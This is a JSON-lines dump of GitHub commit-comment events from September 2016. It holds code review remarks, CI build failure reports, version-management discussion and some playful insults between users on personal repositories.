{"id":"4603586593","type":"CommitCommentEvent","actor":{"login":"BrokenSudhirS"},"repo":{"name":"WillSquill/WillSquill.github.io"},"payload":{"comment":{"id":19133031,"position":null,"line":null,"path":null,"commit_id":"c7d1f170f6a14567703265c815b3172f9b4b7c59","created_at":"2016-09-22T16:29:14Z","updated_at":"2016-09-22T16:29:14Z","body":"you are bad"}},"created_at":"2016-09-22T16:29:14Z"}
{"id":"4603587418","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19133033,"position":53,"line":0,"path":"libraries/build-docs.xml","commit_id":"12c443106c75a2e821c3978f2969edaef5c5a70c","created_at":"2016-09-22T16:29:23Z","updated_at":"2016-09-22T16:29:23Z","body":"Left for compatibility with previous build output."}},"created_at":"2016-09-22T16:29:23Z"}
{"id":"4603587427","type":"CommitCommentEvent","actor":{"login":"BrokenSudhirS"},"repo":{"name":"WillSquill/WillSquill.github.io"},"payload":{"comment":{"id":19133034,"position":null,"line":null,"path":null,"commit_id":"c7d1f170f6a14567703265c815b3172f9b4b7c59","created_at":"2016-09-22T16:29:23Z","updated_at":"2016-09-22T16:29:23Z","body":"in fact ur rlly bad"}},"created_at":"2016-09-22T16:29:23Z"}
{"id":"4603588508","type":"CommitCommentEvent","actor":{"login":"BrokenSudhirS"},"repo":{"name":"WillSquill/WillSquill.github.io"},"payload":{"comment":{"id":19133035,"position":null,"line":null,"path":null,"commit_id":"c7d1f170f6a14567703265c815b3172f9b4b7c59","created_at":"2016-09-22T16:29:35Z","updated_at":"2016-09-22T16:29:35Z","body":"even pipin is better than u"}},"created_at":"2016-09-22T16:29:35Z"}
{"id":"4603589238","type":"CommitCommentEvent","actor":{"login":"BrokenSudhirS"},"repo":{"name":"WillSquill/WillSquill.github.io"},"payload":{"comment":{"id":19133036,"position":null,"line":null,"path":null,"commit_id":"c7d1f170f6a14567703265c815b3172f9b4b7c59","created_at":"2016-09-22T16:29:42Z","updated_at":"2016-09-22T16:29:42Z","body":"naa jk, pipin is crap"}},"created_at":"2016-09-22T16:29:42Z"}
{"id":"4603590084","type":"CommitCommentEvent","actor":{"login":"BrokenSudhirS"},"repo":{"name":"WillSquill/WillSquill.github.io"},"payload":{"comment":{"id":19133037,"position":null,"line":null,"path":null,"commit_id":"c7d1f170f6a14567703265c815b3172f9b4b7c59","created_at":"2016-09-22T16:29:51Z","updated_at":"2016-09-22T16:29:51Z","body":"ur acc not that bad at this"}},"created_at":"2016-09-22T16:29:51Z"}
{"id":"4603590642","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19133039,"position":null,"line":null,"path":null,"commit_id":"e2f80d9b417ca46a7c62bc4c9532d12361e0b930","created_at":"2016-09-22T16:29:56Z","updated_at":"2016-09-22T16:29:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1127](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13993&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 8 (8 new), passed: 223, ignored: 3 Build time: 00:09:51\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET, PUT, DELETE, and POST '/ping' request fails on non-existent device: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.GET /system_info request fails on non-existent device: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.GET /group_info request fails on non-existent device: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.DELETE request after POST succeds and deletes device.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.POST request with same deviceName fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request updates device.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request with same deviceName fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.DELETE group_info should delete group.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T16:29:56Z"}
{"id":"4603590649","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19133040,"position":null,"line":null,"path":null,"commit_id":"8428a453186eaa82838bbc14137a44ff52cd1b0e","created_at":"2016-09-22T16:29:57Z","updated_at":"2016-09-22T16:29:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1128](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13996&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T16:29:57Z"}
{"id":"4603597277","type":"CommitCommentEvent","actor":{"login":"pke"},"repo":{"name":"eberlitz/splashicon-generator"},"payload":{"comment":{"id":19133054,"position":null,"line":null,"path":null,"commit_id":"7aa8f2f9c330bc5e0a8bcd41bafe5217677e1f61","created_at":"2016-09-22T16:31:05Z","updated_at":"2016-09-22T16:31:05Z","body":"Was the bin file changed also? Because this was driving me crazy on the mac"}},"created_at":"2016-09-22T16:31:05Z"}
{"id":"4603597514","type":"CommitCommentEvent","actor":{"login":"BrokenSudhirS"},"repo":{"name":"DanielPate/DanielPate.github.io"},"payload":{"comment":{"id":19133055,"position":null,"line":null,"path":null,"commit_id":"2b43832586e17c9a1c402ad398eaaaad9cf24f1b","created_at":"2016-09-22T16:31:08Z","updated_at":"2016-09-22T16:31:08Z","body":"helo there pipin_fool_of_a_tuk"}},"created_at":"2016-09-22T16:31:08Z"}
{"id":"4603598271","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":19133056,"position":null,"line":null,"path":null,"commit_id":"b3b9f65da394a6d90feab074a5385c943479a135","created_at":"2016-09-22T16:31:15Z","updated_at":"2016-09-22T16:31:15Z","body":"@seckroth Wonderful! It's so nice to see the full TOC, search box, and ebooks at https://history.state.gov/historicaldocuments/frus1977-80v16.\r\n\r\n@tomfaith @mcdanielhn I recall we've discussed the idea of tweeting when the full text of a volume is available (+ ebooks + TEI). Forgive me if you've already started doing this and I've missed it, but if not, would you consider tweeting this out?"}},"created_at":"2016-09-22T16:31:15Z"}
{"id":"4603598428","type":"CommitCommentEvent","actor":{"login":"BrokenSudhirS"},"repo":{"name":"DanielPate/DanielPate.github.io"},"payload":{"comment":{"id":19133057,"position":null,"line":null,"path":null,"commit_id":"2b43832586e17c9a1c402ad398eaaaad9cf24f1b","created_at":"2016-09-22T16:31:17Z","updated_at":"2016-09-22T16:31:17Z","body":"xxpipinslayerxx"}},"created_at":"2016-09-22T16:31:17Z"}
{"id":"4603598844","type":"CommitCommentEvent","actor":{"login":"BrokenSudhirS"},"repo":{"name":"DanielPate/DanielPate.github.io"},"payload":{"comment":{"id":19133059,"position":null,"line":null,"path":null,"commit_id":"2b43832586e17c9a1c402ad398eaaaad9cf24f1b","created_at":"2016-09-22T16:31:22Z","updated_at":"2016-09-22T16:31:22Z","body":"ur a poop"}},"created_at":"2016-09-22T16:31:22Z"}
{"id":"4603602753","type":"CommitCommentEvent","actor":{"login":"jonah-m1"},"repo":{"name":"philiparola/bpsrobotics.github.io"},"payload":{"comment":{"id":19133062,"position":null,"line":null,"path":null,"commit_id":"d21fd1f5096c0434def4cdbccae3475ba6da9abf","created_at":"2016-09-22T16:32:03Z","updated_at":"2016-09-22T16:32:03Z","body":"I'm no programmer. Hire someone who knows what they are doing."}},"created_at":"2016-09-22T16:32:03Z"}
{"id":"4603605804","type":"CommitCommentEvent","actor":{"login":"pabloz"},"repo":{"name":"lontivero/PyChainpoint"},"payload":{"comment":{"id":19133072,"position":15,"line":17,"path":"chainpoint.py","commit_id":"1f1c381aaebe56bb18c6eaaf6e491eb0e9a515bd","created_at":"2016-09-22T16:32:37Z","updated_at":"2016-09-22T16:32:37Z","body":"How is this used? without a @staticmethod decorator dct will always be the instance (\"self\"). In any case, why would you want to return the original dictionary(?) when you can't cast to complex? let it blow!\r\nconsider defining `def __complex__(self): (...)` instead."}},"created_at":"2016-09-22T16:32:37Z"}
{"id":"4603607958","type":"CommitCommentEvent","actor":{"login":"lambdaR"},"repo":{"name":"lambdaR/HelloWorld"},"payload":{"comment":{"id":19133079,"position":null,"line":null,"path":null,"commit_id":"5ab16f5e240ca1cbbef06f78ec7a652603b2cc3e","created_at":"2016-09-22T16:33:00Z","updated_at":"2016-09-22T16:33:00Z","body":"Initial file"}},"created_at":"2016-09-22T16:33:00Z"}
{"id":"4603610189","type":"CommitCommentEvent","actor":{"login":"kamarush"},"repo":{"name":"kamarush/android_device_lge_hammerhead"},"payload":{"comment":{"id":19133082,"position":null,"line":null,"path":null,"commit_id":"bbb0d1efd2ec15dec3e0c3eefe58b99708cb869b","created_at":"2016-09-22T16:33:23Z","updated_at":"2016-09-22T16:33:23Z","body":"http://forum.xda-developers.com/showpost.php?p=68809379&postcount=192"}},"created_at":"2016-09-22T16:33:23Z"}
{"id":"4603610770","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19133083,"position":null,"line":null,"path":null,"commit_id":"0b94b3275ab0125f4dedf9bdcf9f78aa86a30638","created_at":"2016-09-22T16:33:29Z","updated_at":"2016-09-22T16:33:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1129](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13999&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T16:33:29Z"}
{"id":"4603611282","type":"CommitCommentEvent","actor":{"login":"danielkrizian"},"repo":{"name":"danielkrizian/poetiq"},"payload":{"comment":{"id":19133086,"position":5,"line":4,"path":"code/optimiser/opt.q","commit_id":"75daeca2f120194053344c3882f5297127046fde","created_at":"2016-09-22T16:33:34Z","updated_at":"2016-09-22T16:33:34Z","body":"@mortensorensen quite opaque that `hbtt` is defined elsewhere -> in `code/processes/optimiser.q`\r\n``hbtt: .servers.gethandlebytype[`bttickerplant;`any]`` line in this file would throw `'.servers.gethandlebytype`"}},"created_at":"2016-09-22T16:33:34Z"}
{"id":"4603614275","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19133094,"position":6,"line":395,"path":"mandelbulber2/src/compute_fractal.cpp","commit_id":"7e7efe670986153ec90987586317153c392afe03","created_at":"2016-09-22T16:34:04Z","updated_at":"2016-09-22T16:34:04Z","body":"@mclarekin \r\nhey graeme,\r\n\r\nI think you have your indentation wrong in your IDE.\r\nMake sure you are using tabs, in qtcreator here:\r\nTools > Options > C++ > Edit Settings > Tab Policy ----> Select tabs only\r\n\r\n"}},"created_at":"2016-09-22T16:34:04Z"}
{"id":"4603614740","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19133096,"position":null,"line":null,"path":null,"commit_id":"0b94b3275ab0125f4dedf9bdcf9f78aa86a30638","created_at":"2016-09-22T16:34:09Z","updated_at":"2016-09-22T16:34:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1129](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13999&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:40"}},"created_at":"2016-09-22T16:34:09Z"}
{"id":"4603614856","type":"CommitCommentEvent","actor":{"login":"FacticiusVir"},"repo":{"name":"FacticiusVir/SharpVk"},"payload":{"comment":{"id":19133097,"position":null,"line":null,"path":null,"commit_id":"c74feb696fa35b7f6dd7be6b504a1ac3b6e2f777","created_at":"2016-09-22T16:34:10Z","updated_at":"2016-09-22T16:34:10Z","body":"#12"}},"created_at":"2016-09-22T16:34:10Z"}
{"id":"4603615190","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19133099,"position":null,"line":null,"path":null,"commit_id":"bfc48040efe7479a6aaf616faa59f4a0aa5e6370","created_at":"2016-09-22T16:34:13Z","updated_at":"2016-09-22T16:34:13Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2312 of 2493 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bfc48040efe7479a6aaf616faa59f4a0aa5e6370-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bfc48040efe7479a6aaf616faa59f4a0aa5e6370-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.74%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T16:34:13Z"}
{"id":"4603624167","type":"CommitCommentEvent","actor":{"login":"pquentin"},"repo":{"name":"Yoric/yoric.github.io"},"payload":{"comment":{"id":19133114,"position":66,"line":66,"path":"_posts/2016-09-19-Extracting-text-from-images-is-not-easy-who-would-have-guessed.adoc","commit_id":"597f725196378f4d94e071c5f2a2e635601a22cf","created_at":"2016-09-22T16:35:45Z","updated_at":"2016-09-22T16:35:45Z","body":"markdown renders your list above as 1, 2 and 3, so saying \"algorithms for a., b. and c.\" afterwards does not make sense."}},"created_at":"2016-09-22T16:35:45Z"}
{"id":"4603625617","type":"CommitCommentEvent","actor":{"login":"M66B"},"repo":{"name":"M66B/BackPackTrackII"},"payload":{"comment":{"id":19133118,"position":null,"line":null,"path":null,"commit_id":"c00c1bce9ecf430350aef2c81a9627b7b28ff419","created_at":"2016-09-22T16:36:01Z","updated_at":"2016-09-22T16:36:01Z","body":"Contact me and I will build a version for you.\r\nI keep it updated, because I use it myself."}},"created_at":"2016-09-22T16:36:01Z"}
{"id":"4603626810","type":"CommitCommentEvent","actor":{"login":"nickhammond"},"repo":{"name":"nodesource/ansible-nodejs-role"},"payload":{"comment":{"id":19133122,"position":null,"line":null,"path":null,"commit_id":"f2a992dc6943d13de15ef24842b1161b6aad386d","created_at":"2016-09-22T16:36:13Z","updated_at":"2016-09-22T16:36:13Z","body":"@jwhitlock Thanks for updating this, much appreciated."}},"created_at":"2016-09-22T16:36:13Z"}
{"id":"4603627687","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"electron-userland/electron-prebuilt"},"payload":{"comment":{"id":19133124,"position":null,"line":null,"path":null,"commit_id":"509a04db63bd6f372de4ce6ac88dbe28a241b3a3","created_at":"2016-09-22T16:36:22Z","updated_at":"2016-09-22T16:36:22Z","body":"The dependency on the package version seems a little odd to me. Wouldn't it be easier to never update electron-prebuilt and specify that version in the env or npmrc? It also makes it really hard for projects with electron forks to use prebuilt. I'll submit a PR for it, but I'm thinking something like\r\n`process.env.ELECTRON_VERSION || process.env.npm_config_electron_version`"}},"created_at":"2016-09-22T16:36:22Z"}
{"id":"4603633348","type":"CommitCommentEvent","actor":{"login":"suyograo"},"repo":{"name":"elastic/kibana"},"payload":{"comment":{"id":19133136,"position":null,"line":null,"path":null,"commit_id":"034e7d9bd1531a64389a698596737dc01633adb9","created_at":"2016-09-22T16:37:23Z","updated_at":"2016-09-22T16:37:23Z","body":"LGTM"}},"created_at":"2016-09-22T16:37:23Z"}
{"id":"4603633951","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19133138,"position":null,"line":null,"path":null,"commit_id":"5c942cd3750bd0dfd7415583c2ef468eb6148b7a","created_at":"2016-09-22T16:37:30Z","updated_at":"2016-09-22T16:37:30Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1130](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14004&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T16:37:30Z"}
{"id":"4603639835","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"MelanieCLopez/Guadalayians"},"payload":{"comment":{"id":19133155,"position":null,"line":null,"path":null,"commit_id":"a4f05eb1f90284b821e19bcb65ccb2ccf0de893a","created_at":"2016-09-22T16:38:34Z","updated_at":"2016-09-22T16:38:34Z","body":"![img_4o5ac6](https://cloud.githubusercontent.com/assets/22220964/18757324/4a5c3a68-80a8-11e6-89db-420ec6cc1a50.jpg)\r\n![img_4o5ac6](https://cloud.githubusercontent.com/assets/22220964/18757327/520da896-80a8-11e6-904f-18c0ab44d279.jpg)\r\n"}},"created_at":"2016-09-22T16:38:34Z"}
{"id":"4603641327","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19133159,"position":null,"line":null,"path":null,"commit_id":"8428a453186eaa82838bbc14137a44ff52cd1b0e","created_at":"2016-09-22T16:38:50Z","updated_at":"2016-09-22T16:38:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1128](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13996&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 5 (1 new), passed: 217, ignored: 3 Build time: 00:08:54\n### Failed tests\n```\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.rest of installation queue (consecutive installPos) remains Pending upon one package failing to install: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.update requests with blacklisted packages are excluded from queue: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.returns in flight updates for /queued endpoint: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.updates updated_time field is returned to client: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.PUT to set install order should change the package install order: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T16:38:50Z"}
{"id":"4603647647","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/sparklyr"},"payload":{"comment":{"id":19133177,"position":15,"line":47,"path":"README.md","commit_id":"49198b2aea99f6a7bc76fd9faafeb91079d66227","created_at":"2016-09-22T16:39:55Z","updated_at":"2016-09-22T16:39:55Z","body":"Can we get rid of these warnings?"}},"created_at":"2016-09-22T16:39:55Z"}
{"id":"4603647795","type":"CommitCommentEvent","actor":{"login":"mafintosh"},"repo":{"name":"electron-userland/electron-prebuilt"},"payload":{"comment":{"id":19133178,"position":null,"line":null,"path":null,"commit_id":"509a04db63bd6f372de4ce6ac88dbe28a241b3a3","created_at":"2016-09-22T16:39:56Z","updated_at":"2016-09-22T16:39:56Z","body":"using the version means you can use semver ranges when installing devDependencies (I personally use this a lot to pin old versions for various reasons). why is this a problem for \"forks\"? you can always just depend on '*'"}},"created_at":"2016-09-22T16:39:56Z"}
{"id":"4603647947","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19133181,"position":270,"line":633,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-22T16:39:58Z","updated_at":"2016-09-22T16:39:58Z","body":"It's working without the file, maybe it's because it was already added on the main template"}},"created_at":"2016-09-22T16:39:58Z"}
{"id":"4603648180","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19133183,"position":null,"line":null,"path":null,"commit_id":"5c942cd3750bd0dfd7415583c2ef468eb6148b7a","created_at":"2016-09-22T16:40:01Z","updated_at":"2016-09-22T16:40:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1130](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14004&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:02:31"}},"created_at":"2016-09-22T16:40:01Z"}
{"id":"4603652589","type":"CommitCommentEvent","actor":{"login":"nebukazar"},"repo":{"name":"nebukazar/OneeChan"},"payload":{"comment":{"id":19133212,"position":8,"line":26,"path":"src/css/Catalog.css","commit_id":"1451db0c2f75902213648d472963f9a817c82576","created_at":"2016-09-22T16:40:46Z","updated_at":"2016-09-22T16:40:46Z","body":"I find out what this was for, it shouldn't have been moved into Catalog.css as it was part of Options.css.  \r\n\r\nThis is used for styling the theme options section of Oneechan but when viewing the catalog `blockquote` has no CSS and this fixes it."}},"created_at":"2016-09-22T16:40:46Z"}
{"id":"4603653399","type":"CommitCommentEvent","actor":{"login":"bergercookie"},"repo":{"name":"MRPT/mrpt"},"payload":{"comment":{"id":19133216,"position":null,"line":null,"path":null,"commit_id":"4137046479222f3a71b5c00aee1d5fa8c04017f2","created_at":"2016-09-22T16:40:55Z","updated_at":"2016-09-22T16:40:55Z","body":"Wow, thanks for fixing this! 👍 "}},"created_at":"2016-09-22T16:40:55Z"}
{"id":"4603656142","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19133220,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-22T16:41:25Z","updated_at":"2016-09-22T16:41:25Z","body":"L425 refresh = Logic Change to just force vs \r\n(force and (expired_min == 0 or repo_age_sec < expired_min)) Still missing\r\n\r\nShould read\r\n```\r\n    # winrepo_age is -1 if repo db does not exist\r\n    refresh = True if (force and (expired_min == 0 or repo_details.winrepo_age < expired_min)) \\\r\n        or repo_details.winrepo_age == -1 \\\r\n        or repo_details.winrepo_age > expired_max \\\r\n        else False\r\n```"}},"created_at":"2016-09-22T16:41:25Z"}
{"id":"4603666557","type":"CommitCommentEvent","actor":{"login":"leppie"},"repo":{"name":"driftyco/ionic-app-scripts"},"payload":{"comment":{"id":19133233,"position":5,"line":10,"path":"src/bundle.ts","commit_id":"df38cb4fd2117d37e99a5b0a1aa94b50dc7ebeba","created_at":"2016-09-22T16:43:20Z","updated_at":"2016-09-22T16:43:20Z","body":"`ROLLUP_TASK_INFO.defaultConfigFilename` needs to be modified before this, and not in `runBundle`"}},"created_at":"2016-09-22T16:43:20Z"}
{"id":"4603667344","type":"CommitCommentEvent","actor":{"login":"bermanjosh"},"repo":{"name":"bermanjosh/bloodhound"},"payload":{"comment":{"id":19133236,"position":null,"line":null,"path":null,"commit_id":"7ffb3d2fdef1307b0b9c5731909edac89a9bdc67","created_at":"2016-09-22T16:43:28Z","updated_at":"2016-09-22T16:43:28Z","body":"@MichaelXavier \r\nYou're right; they will always work, defaulting to `Nothing`, and yes, it will mask an error there.\r\n\r\nThe explicit 'NA' parser - that would work for the VersionNumber case, where I can specify what to parse for. But not the \"load_average\" case, which may not be there  - though, now that I'm thinking about it, I might be able to use the normal `.:?`.\r\n\r\nI'm happy do run with this. One thing for your consideration - would it make more sense, instead of wrapping a `Maybe`, changing VersionNumber to an ADT encapsulating the Null case? "}},"created_at":"2016-09-22T16:43:28Z"}
{"id":"4603671623","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19133248,"position":21,"line":19,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T16:44:14Z","updated_at":"2016-09-22T16:44:14Z","body":"Qualcosa non funziona come dovrebbe? Segnala il problema."}},"created_at":"2016-09-22T16:44:14Z"}
{"id":"4603672089","type":"CommitCommentEvent","actor":{"login":"Redjumpman"},"repo":{"name":"Redjumpman/Jumper-Cogs"},"payload":{"comment":{"id":19133249,"position":null,"line":null,"path":null,"commit_id":"f5a8beca291e4fcbd4b322c1438d4fb19d7deff8","created_at":"2016-09-22T16:44:19Z","updated_at":"2016-09-22T16:44:19Z","body":"Hotfix for ending the joining phase too early."}},"created_at":"2016-09-22T16:44:19Z"}
{"id":"4603673261","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19133252,"position":null,"line":null,"path":null,"commit_id":"ef1226b4cead0a07b72c225954954cf68255c32b","created_at":"2016-09-22T16:44:32Z","updated_at":"2016-09-22T16:44:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1131](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14008&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T16:44:32Z"}
{"id":"4603673744","type":"CommitCommentEvent","actor":{"login":"leppie"},"repo":{"name":"driftyco/ionic-app-scripts"},"payload":{"comment":{"id":19133255,"position":5,"line":10,"path":"src/bundle.ts","commit_id":"df38cb4fd2117d37e99a5b0a1aa94b50dc7ebeba","created_at":"2016-09-22T16:44:38Z","updated_at":"2016-09-22T16:44:38Z","body":"Let me know if you I need to report an issue. This seems like quite a moving target for now :D"}},"created_at":"2016-09-22T16:44:38Z"}
{"id":"4603674883","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19133258,"position":null,"line":null,"path":null,"commit_id":"5c75cb88ffad30260608e48e1269352aecd01912","created_at":"2016-09-22T16:44:50Z","updated_at":"2016-09-22T16:44:50Z","body":"\nBuild report #161964030 for sha 5c75cb88ffad30260608e48e1269352aecd01912:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-0%20/%200%20%280.00%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-22T16:44:50Z"}
{"id":"4603675141","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"electron-userland/electron-prebuilt"},"payload":{"comment":{"id":19133259,"position":null,"line":null,"path":null,"commit_id":"509a04db63bd6f372de4ce6ac88dbe28a241b3a3","created_at":"2016-09-22T16:44:53Z","updated_at":"2016-09-22T16:44:53Z","body":"there are several problems:\r\n1. We don't always have the same version as electron so we have to fork and update for each one\r\n2. Several other build modules depend on the version in electron-prebuilt packages.json so we have to fork all of those as well\r\nI don't really understand the devDependencies argument because the only reason you would change versions for electron-prebuilt is to get feature/bug fix updates. The actual electron download version would always be the one in your npmrc\r\nA lot of the parameters are currently settable in the npmrc, but the ones we really need are missing. I guess I don't care if you want to keep updating electron-prebuilt for every single electron release, but there should be a way to override it and use a different version in all the build modules"}},"created_at":"2016-09-22T16:44:53Z"}
{"id":"4603677724","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"thangngoc89/react-howler"},"payload":{"comment":{"id":19133271,"position":13,"line":13,"path":"src/utils.js","commit_id":"f7e63827542a36af81d2a572eb17db5d355a99c3","created_at":"2016-09-22T16:45:20Z","updated_at":"2016-09-22T16:45:20Z","body":"this function is almost useless. I'm open for a PR to remove this function and replace it in these lines https://github.com/thangngoc89/react-howler/blob/36db3f3e94830a9b4de6a2c7fd2674910e01b670/src/ReactHowler.js#L60-L61"}},"created_at":"2016-09-22T16:45:20Z"}
{"id":"4603678546","type":"CommitCommentEvent","actor":{"login":"pabloz"},"repo":{"name":"lontivero/PyChainpoint"},"payload":{"comment":{"id":19133273,"position":54,"line":54,"path":"README.md","commit_id":"99531bdf68b7e1f67196f4c50a0bf47a92189c12","created_at":"2016-09-22T16:45:29Z","updated_at":"2016-09-22T16:45:29Z","body":"Use the literal notation instead of a call to the constructor to illustrate return values. e,g,\r\n```python\r\n{\"is_valid\": True,\r\n \"type\": \"BTCOpReturn\",\r\n \"source_id\": \"f3be82fe1b5d8f18e009cb9a491781289d2e01678311fe2b2e4e84381aafadee\",\r\n \"exists\": True}  # <-- corrected typo in \"true\"\r\n```\r\n\r\nBetter yet, use an actual session log in the interactive shell, i.e.:\r\n```python\r\n# ...snip...\r\n>>> validator = Chainpoint()\r\n>>> result = validator.is_valid_receipt(receipt)\r\n{'source_id': 'f3be82fe1b5d8f18e009cb9a491781289d2e01678311fe2b2e4e84381aafadee', 'is_valid': True, 'type': 'BTCOpReturn', 'exists': True}\r\n```"}},"created_at":"2016-09-22T16:45:29Z"}
{"id":"4603683166","type":"CommitCommentEvent","actor":{"login":"savolai"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":19133288,"position":null,"line":null,"path":null,"commit_id":"4da05e5914db73bf1d3a347be609ba8d3464a4db","created_at":"2016-09-22T16:46:18Z","updated_at":"2016-09-22T16:46:18Z","body":"Hi. Sorry to bust in to your comments section, but is this something that might make UAC work in NSIS 3? \r\nI am getting \r\n\r\n!undef: \"_UAC_ParseDefineFlags_orin_f2\" not defined!\r\nError in macro _UAC_ParseDefineFlags_orin on macroline 12\r\nError in macro _UAC_ParseDefineFlags_Begin on macroline 6\r\nError in macro _UAC_ParseDefineFlagsToInt on macroline 1\r\nError in macro UAC_AsUser_Call on macroline 5\r\nError in macro UAC_AsUser_ExecShell on macroline 11\r\n"}},"created_at":"2016-09-22T16:46:18Z"}
